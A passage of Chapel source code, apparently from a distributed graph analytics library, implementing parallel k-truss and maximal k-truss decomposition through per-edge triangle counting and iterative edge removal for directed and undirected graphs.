while (ConFlag) {
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((lEdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
lEdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
//while (!SetCurF.isEmpty()) {
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if lEdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (lEdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if (lEdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
} else {
if (dv2>0) {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (lEdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if (lEdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (lEdgeDeleted[i]==1-k)) {//each local only check the owned edges
lEdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
if (lEdgeDeleted[j]==-1) {
rset.add((i,j));
}
}
}// end of forall
for (i,j) in rset {
if (lEdgeDeleted[j]==-1) {
TriCount[j].sub(1);
if (TriCount[j].read()<k-2) {
lEdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
} //end coforall loc in Locales
tmpN2+=1;
SetNextF.clear();
}// end of while (!SetCurF.isEmpty())
N2+=1;
}// end while
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
if (lEdgeDeleted[i]==1-k) {
lEdgeDeleted[i] = k-1;
}
}
}// end of on loc
} // end of coforall loc in Locales
var tmpi=0;
while tmpi<Ne {
if (lEdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
return true;
} // end of proc SKMaxTrussMix
//For Directed graph
proc SkMaxTrussNaiveDirected(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):bool throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
forall i in TriCount {
i.write(0);
}
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (lEdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if ((lEdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((lEdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
lEdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
if SetCurF.getSize()>0 {
ConFlag=true;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
var tmpi=0;
while tmpi<Ne {
if (lEdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
return true;
} // end of proc SkMaxTrussNaiveDirected
//For directed graph
proc SkMaxTrussDirected(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):bool throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
forall i in TriCount {
i.write(0);
}
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (lEdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((lEdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((lEdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if ((lEdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
}
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((lEdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
lEdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((lEdgeDeleted[j]==-1) && (i<tmpe)) {
if ((lEdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
if EReverse[i].size>0 {
forall (e1,e2) in EReverse[i] {
if ((lEdgeDeleted[e1]==-1) && (lEdgeDeleted[e2]==-1)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (lEdgeDeleted[i]==1-k)) {//each local only check the owned edges
lEdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
lEdgeDeleted[j]=1-k;
SetCurF.add(j);
// rset.add((i,j));// just want (i,j) is unique in rset
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
N2+=1;
}// end while
timer.stop();
var tmpi=0;
while tmpi<Ne {
if (lEdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
return true;
} // end of proc SkMaxTrussDirected
//End of Max KTruss Serial
//For undirected graph, using the naive method
proc TrussDecompositionNaivePathMerge(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws {
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var k=kvalue:int;
var timer:Timer;
var largest:int;
largest=Ne;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge {
TriCount[i]=0;
var u = src[i];
var v = dst[i];
var beginUf=start_i[u];
var endUf=beginUf+nei[u]-1;
var beginUb=start_iR[u];
var endUb=beginUb+neiR[u]-1;
var beginVf=start_i[v];
var endVf=beginVf+nei[v]-1;
var beginVb=start_iR[v];
var endVb=beginVb+neiR[v]-1;
var iu:int;
var jv:int;
var eu:int;
var ev:int;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
iu=beginUf;
jv=beginVf;
//writeln("Enter while 1 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVf)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dst[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUf;
jv=beginVb;
//writeln("Enter while 2 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVb)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dst[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVf;
//writeln("Enter while 3 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVf)) {
eu=findEdge(dstR[iu],u);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dstR[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVb;
//writeln("Enter while 4 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVb)) {
eu=findEdge(dstR[iu],u);
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dstR[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
SetCurF.clear();
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
//writeln("Remove edge ",i, " in iteration ", N2);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
} else {
ConFlag=true;
}
SetCurF.clear();
var tmpi=0;
if (ConFlag==false) {
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
//k=k+1;
//break;
} else {
tmpi+=1;
}
}
if (ConFlag) {
k+=1;
}
if (tmpi>0) {
largest=tmpi;
}
}
N2+=1;
}// end while
timer.stop();
outMsg="After Truss Naive Decomposition Path Merge, Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Naive Decomposition Path Merge,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Naive Decomposition Path Merge,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Naive Decomposition Path Merge,The largest k-truss edges="+(Ne-largest):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
AllRemoved=true;
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc TrussDecompositionNaivePathMerge
//For undirected graph, use list intersection method just for the initial triangle couting.
proc TrussDecompositionListIntersection(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int,
dst:[?D4] int,
